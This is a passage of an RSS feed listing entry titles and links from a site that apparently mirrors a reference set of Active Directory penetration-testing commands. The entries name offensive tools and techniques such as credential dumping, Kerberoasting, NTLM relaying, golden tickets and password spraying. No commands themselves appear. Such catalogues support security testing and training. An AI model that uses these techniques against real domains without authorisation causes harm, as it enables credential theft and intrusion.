+1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-addcomputer-ldaps/</guid><description/></item><item><title>Impacket addcomputer SMB</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-addcomputer-smb/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-addcomputer-smb/</guid><description/></item><item><title>Impacket atexec Creds</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-atexec-creds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-atexec-creds/</guid><description/></item><item><title>Impacket atexec Hash</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-atexec-hash/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-atexec-hash/</guid><description/></item><item><title>Impacket DCOMExec</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-dcomexec/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-dcomexec/</guid><description/></item><item><title>Impacket Get GPPPassword</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-get-gpppassword/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-get-gpppassword/</guid><description/></item><item><title>Impacket GetADUsers</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-getadusers/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-getadusers/</guid><description/></item><item><title>Impacket GetNPUsers</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-getnpusers/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-getnpusers/</guid><description/></item><item><title>Impacket getST Creds</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-getst-creds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-getst-creds/</guid><description/></item><item><title>Impacket getST Hash</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-getst-hash/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-getst-hash/</guid><description/></item><item><title>Impacket getTGT</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-gettgt/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-gettgt/</guid><description/></item><item><title>Impacket GetUserSPNs</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-getuserspns/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-getuserspns/</guid><description/></item><item><title>Impacket GoldenTicket</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-goldenticket/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-goldenticket/</guid><description/></item><item><title>Impacket LookUpSID</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-lookupsid/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-lookupsid/</guid><description/></item><item><title>Impacket NTLMRelayX</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx/</guid><description/></item><item><title>Impacket NTLMRelayX Socks</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx-socks/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx-socks/</guid><description/></item><item><title>Impacket NTLMRelayX WPAD</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx-wpad/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-ntlmrelayx-wpad/</guid><description/></item><item><title>Impacket PsExec</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-psexec/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-psexec/</guid><description/></item><item><title>Impacket PsExec PassTheTicket</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-psexec-passtheticket/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-psexec-passtheticket/</guid><description/></item><item><title>Impacket RBCD</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-rbcd/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-rbcd/</guid><description/></item><item><title>Impacket Reg</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-reg/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-reg/</guid><description/></item><item><title>Impacket RPCDump</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-rpcdump/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-rpcdump/</guid><description/></item><item><title>Impacket SAMRDump</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-samrdump/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-samrdump/</guid><description/></item><item><title>Impacket SecretsDump</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-secretsdump/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-secretsdump/</guid><description/></item><item><title>Impacket SecretsDump NTDS</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-secretsdump-ntds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-secretsdump-ntds/</guid><description/></item><item><title>Impacket Services</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-services/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-services/</guid><description/></item><item><title>Impacket SilverTicket</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-silverticket/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-silverticket/</guid><description/></item><item><title>Impacket SMBClient</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-smbclient/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-smbclient/</guid><description/></item><item><title>Impacket SMBExec</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-smbexec/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-smbexec/</guid><description/></item><item><title>Impacket WMIExec</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-wmiexec/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/impacket-wmiexec/</guid><description/></item><item><title>Kerbrute BruteForce</title><link>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-bruteforce/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-bruteforce/</guid><description/></item><item><title>Kerbrute BruteUser</title><link>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-bruteuser/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-bruteuser/</guid><description/></item><item><title>Kerbrute PasswordSpray</title><link>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-passwordspray/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-passwordspray/</guid><description/></item><item><title>Kerbrute UserEnum</title><link>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-userenum/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/kerbrute-userenum/</guid><description/></item><item><title>LDAPSearch Creds</title><link>https://bokkapig.pages.dev/refs/wadcoms/ldapsearch-creds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/ldapsearch-creds/</guid><description/></item><item><title>LDAPSearch NoCreds</title><link>https://bokkapig.pages.dev/refs/wadcoms/ldapsearch-nocreds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/ldapsearch-nocreds/</guid><description/></item><item><title>lsassy credsdump</title><link>https://bokkapig.pages.dev/refs/wadcoms/lsassy-credsdump/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/lsassy-credsdump/</guid><description/></item><item><title>Mitm6</title><link>https://bokkapig.pages.dev/refs/wadcoms/mitm6/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/mitm6/</guid><description/></item><item><title>NetExec Creds coerce plus</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-creds-coerce-plus/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-creds-coerce-plus/</guid><description/></item><item><title>NetExec Enum LDAP</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-ldap/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-ldap/</guid><description/></item><item><title>NetExec Enum SMB</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb/</guid><description/></item><item><title>NetExec Enum SMB Anonymous</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-anonymous/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-anonymous/</guid><description/></item><item><title>NetExec Enum SMB Null</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-null/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-null/</guid><description/></item><item><title>NetExec Enum SMB Relay List</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-relay-list/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-enum-smb-relay-list/</guid><description/></item><item><title>NetExec Exec SMB</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-exec-smb/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-exec-smb/</guid><description/></item><item><title>NetExec LDAP ASREPRoasting</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-ldap-asreproasting/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-ldap-asreproasting/</guid><description/></item><item><title>NetExec LDAP Kerberoasting</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-ldap-kerberoasting/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-ldap-kerberoasting/</guid><description/></item><item><title>NetExec SMB Password Spray</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-smb-password-spray/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-smb-password-spray/</guid><description/></item><item><title>NetExec SMB Timeroasting</title><link>https://bokkapig.pages.dev/refs/wadcoms/netexec-smb-timeroasting/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/netexec-smb-timeroasting/</guid><description/></item><item><title>Nmap Krb5 Enum Users</title><link>https://bokkapig.pages.dev/refs/wadcoms/nmap-krb5-enum-users/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/nmap-krb5-enum-users/</guid><description/></item><item><title>PetitPotam</title><link>https://bokkapig.pages.dev/refs/wadcoms/petitpotam/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/petitpotam/</guid><description/></item><item><title>PKINIT getnthash</title><link>https://bokkapig.pages.dev/refs/wadcoms/pkinit-getnthash/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pkinit-getnthash/</guid><description/></item><item><title>PKINIT gettgtpkinit</title><link>https://bokkapig.pages.dev/refs/wadcoms/pkinit-gettgtpkinit/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pkinit-gettgtpkinit/</guid><description/></item><item><title>Powershell ADModule enum</title><link>https://bokkapig.pages.dev/refs/wadcoms/powershell-admodule-enum/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/powershell-admodule-enum/</guid><description/></item><item><title>PSADmodule Kerbaroasting</title><link>https://bokkapig.pages.dev/refs/wadcoms/psadmodule-kerbaroasting/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/psadmodule-kerbaroasting/</guid><description/></item><item><title>PwshADmodule DelegationAttack Enum</title><link>https://bokkapig.pages.dev/refs/wadcoms/pwshadmodule-delegationattack-enum/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pwshadmodule-delegationattack-enum/</guid><description/></item><item><title>PwshADmodule Initial Enum</title><link>https://bokkapig.pages.dev/refs/wadcoms/pwshadmodule-initial-enum/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pwshadmodule-initial-enum/</guid><description/></item><item><title>PyLDAPmonitor</title><link>https://bokkapig.pages.dev/refs/wadcoms/pyldapmonitor/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pyldapmonitor/</guid><description/></item><item><title>PyWhisker</title><link>https://bokkapig.pages.dev/refs/wadcoms/pywhisker/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/pywhisker/</guid><description/></item><item><title>Regexe Persistence</title><link>https://bokkapig.pages.dev/refs/wadcoms/regexe-persistence/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/regexe-persistence/</guid><description/></item><item><title>Responder Analyze</title><link>https://bokkapig.pages.dev/refs/wadcoms/responder-analyze/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/responder-analyze/</guid><description/></item><item><title>RPCClient Anonymous</title><link>https://bokkapig.pages.dev/refs/wadcoms/rpcclient-anonymous/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rpcclient-anonymous/</guid><description/></item><item><title>Rubeus AskTGT</title><link>https://bokkapig.pages.dev/refs/wadcoms/rubeus-asktgt/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rubeus-asktgt/</guid><description/></item><item><title>Rubeus ASREPRoast</title><link>https://bokkapig.pages.dev/refs/wadcoms/rubeus-asreproast/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rubeus-asreproast/</guid><description/></item><item><title>Rubeus Brute</title><link>https://bokkapig.pages.dev/refs/wadcoms/rubeus-brute/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rubeus-brute/</guid><description/></item><item><title>Rubeus Kerberoast</title><link>https://bokkapig.pages.dev/refs/wadcoms/rubeus-kerberoast/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rubeus-kerberoast/</guid><description/></item><item><title>Rubeus s4u</title><link>https://bokkapig.pages.dev/refs/wadcoms/rubeus-s4u/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/rubeus-s4u/</guid><description/></item><item><title>SafetyKatz</title><link>https://bokkapig.pages.dev/refs/wadcoms/safetykatz/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/safetykatz/</guid><description/></item><item><title>Seatbelt</title><link>https://bokkapig.pages.dev/refs/wadcoms/seatbelt/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/seatbelt/</guid><description/></item><item><title>SharpDump</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharpdump/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharpdump/</guid><description/></item><item><title>SharpHound</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharphound/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharphound/</guid><description/></item><item><title>SharpHound LDAP</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharphound-ldap/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharphound-ldap/</guid><description/></item><item><title>SharpLDAPmonitor</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharpldapmonitor/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharpldapmonitor/</guid><description/></item><item><title>SharpUp</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharpup/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharpup/</guid><description/></item><item><title>SharpWMI</title><link>https://bokkapig.pages.dev/refs/wadcoms/sharpwmi/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/sharpwmi/</guid><description/></item><item><title>SMBClient Enum Share</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbclient-enum-share/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbclient-enum-share/</guid><description/></item><item><title>SMBClient Enum Share Anonymous</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbclient-enum-share-anonymous/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbclient-enum-share-anonymous/</guid><description/></item><item><title>SMBClient List Share PTH</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-share-pth/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-share-pth/</guid><description/></item><item><title>SMBClient List Shares</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-shares/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-shares/</guid><description/></item><item><title>SMBClient List Shares Anonymous</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-shares-anonymous/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbclient-list-shares-anonymous/</guid><description/></item><item><title>SMBMap Enum File</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-file/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-file/</guid><description/></item><item><title>SMBMap Enum Share</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-share/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-share/</guid><description/></item><item><title>SMBMap Enum Share Anonymous</title><link>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-share-anonymous/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/smbmap-enum-share-anonymous/</guid><description/></item><item><title>Snaffler</title><link>https://bokkapig.pages.dev/refs/wadcoms/snaffler/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/snaffler/</guid><description/></item><item><title>targetedKerberoast</title><link>https://bokkapig.pages.dev/refs/wadcoms/targetedkerberoast/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/targetedkerberoast/</guid><description/></item><item><title>Windapsearch</title><link>https://bokkapig.pages.dev/refs/wadcoms/windapsearch/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/windapsearch/</guid><description/></item><item><title>winPEAS</title><link>https://bokkapig.pages.dev/refs/wadcoms/winpeas/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/winpeas/</guid><description/></item><item><title>search</title><link>https://bokkapig.pages.dev/search/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/search/</guid><description>Search every writeup and every mirrored reference set at once.</description></item></channel></rss>